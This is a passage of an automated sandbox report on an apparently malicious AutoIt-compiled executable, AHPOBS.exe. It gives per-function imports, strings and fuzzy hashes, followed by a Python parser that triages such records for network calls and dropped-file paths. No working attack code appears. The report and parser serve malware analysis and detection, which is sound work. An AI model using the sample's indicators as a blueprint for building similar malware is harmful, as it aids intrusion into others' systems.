                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$_sprintf_strlen
                                      • String ID: %02X
                                      • API String ID: 1921645428-436463671
                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                      • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: <local>
                                      • API String ID: 2038078732-4266983199
                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 24569dc5cb1a7ad9c060fa553b036e472b1e882c473ac0d65276195ad808a589
                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                      • Opcode Fuzzy Hash: 24569dc5cb1a7ad9c060fa553b036e472b1e882c473ac0d65276195ad808a589
                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                      APIs
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • wsprintfW.USER32 ref: 0045612A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend_mallocwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 1262938277-328681919
                                      • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                      • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                      • InternetCloseHandle.WININET ref: 00442668
                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                      • String ID: aeB
                                      • API String ID: 857135153-906807131
                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: ^B$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 1735881322-4245338930
                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D
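The function summaries above are the Joe Sandbox IDA plugin's per-function records for the dumped AHPOBS.exe image (process 10, base 0x400000): each block lists the Win32 imports the function calls, the strings it references, the opcode and instruction fuzzy hashes, and an "API ID"/"String ID" pair used for similarity matching. Reading hundreds of these by hand is slow, so the following is an added example (written for this page, not Joe Sandbox code) of a small Python parser that turns such records into structured data, names the window messages passed to SendMessageW using constants from the Windows SDK headers, and flags the functions a reviewer would open first: those that import from WININET/WS2_32, whose API ID names socket helpers such as htons/inet_addr even when the APIs list is empty, or whose strings carry an embedded executable path. The sample input is constructed from five records above, trimmed to the lines the parser consumes; the triage rules and the field names SAMPLE, NET_MODULES and MSG_NAMES are this example's own.

```python
"""Parse Joe Sandbox IDA-plugin function summaries (the record layout shown
above) into structured triage data.  Added example, not Joe Sandbox code."""
import re
from collections import namedtuple

# Window-message values from the Windows SDK headers (winuser.h, commctrl.h),
# used only to annotate the msg argument of SendMessageW(hwnd, msg, wp, lp).
MSG_NAMES = {0x00B1: "EM_SETSEL", 0x0143: "CB_ADDSTRING",
             0x014E: "CB_SETCURSEL", 0x1001: "LVM_SETBKCOLOR"}
NET_MODULES = {"WININET", "WS2_32", "WINHTTP"}   # imports that imply network I/O
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"•\s*(?P<nested>Part of subcall function [0-9A-F]+:\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
                    r",?\s*ref:\s*(?P<ref>[0-9A-F]+)")
FIELD_RE = re.compile(r"•\s*(?P<key>[^:]+):\s*(?P<val>.*)")
ApiCall = namedtuple("ApiCall", "name module args ref nested")  # nested: subcall line

# Constructed sample: five records from the report above, trimmed to the
# lines the parser consumes; addresses, hashes and strings are unchanged.
SAMPLE = r"""
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Similarity
• API ID: InternetOpen
• String ID: <local>
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
APIs
Strings
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
"""

def parse_records(text):
    """Split report text into one {"apis": [...], "fields": {...}} per 'APIs' block."""
    records, cur, section = [], None, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line == "APIs":                       # every record starts here
            cur, section = {"apis": [], "fields": {}}, "APIs"
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line in SECTIONS:
            section = line
        elif section == "APIs":
            if m := API_RE.match(line):          # calls, incl. "Part of subcall" lines
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur["apis"].append(ApiCall(m["name"], m["module"], args, m["ref"],
                                           m["nested"] is not None))
        elif m := FIELD_RE.match(line):          # "• Key: value" bullets
            cur["fields"][m["key"]] = m["val"]
    return records

def string_ids(rec):
    """'String ID' joins several strings with '$', e.g. "AutoIt$Error ..."."""
    return [s for s in rec["fields"].get("String ID", "").split("$") if s]

def message_name(call):
    """Name the window message in a SendMessageW call (None if not one or msg is '?')."""
    if call.name != "SendMessageW" or len(call.args) < 2 \
            or not re.fullmatch(r"[0-9A-Fa-f]+", call.args[1]):
        return None
    msg = int(call.args[1], 16)
    return MSG_NAMES.get(msg, f"0x{msg:04X}")

def triage(records):
    """(record index, reason) pairs for functions worth manual review; example heuristics."""
    hits = []
    for i, r in enumerate(records):
        net = {c.module for c in r["apis"]} & NET_MODULES
        if net:
            hits.append((i, "network module " + ",".join(sorted(net))))
        elif not r["apis"] and re.search(r"inet_addr|htons|socket|Internet",
                                         r["fields"].get("API ID", "")):
            hits.append((i, "network API ID " + r["fields"]["API ID"]))
        for s in string_ids(r):                  # dropped-file paths like the AHPOBS.exe one
            if re.fullmatch(r"[A-Za-z]:\\.*\.exe", s):
                hits.append((i, "embedded path " + s))
    return hits
```

Feeding the whole "Functions" section of a report through parse_records and then triage gives a short list of function addresses (the ref values) to open first in the dumped binary; the message names are what let a reader see that the two Combobox calls are CB_ADDSTRING/CB_SETCURSEL and the "edit" one is EM_SETSEL, i.e. AutoIt GUI runtime code rather than the RAT's own logic.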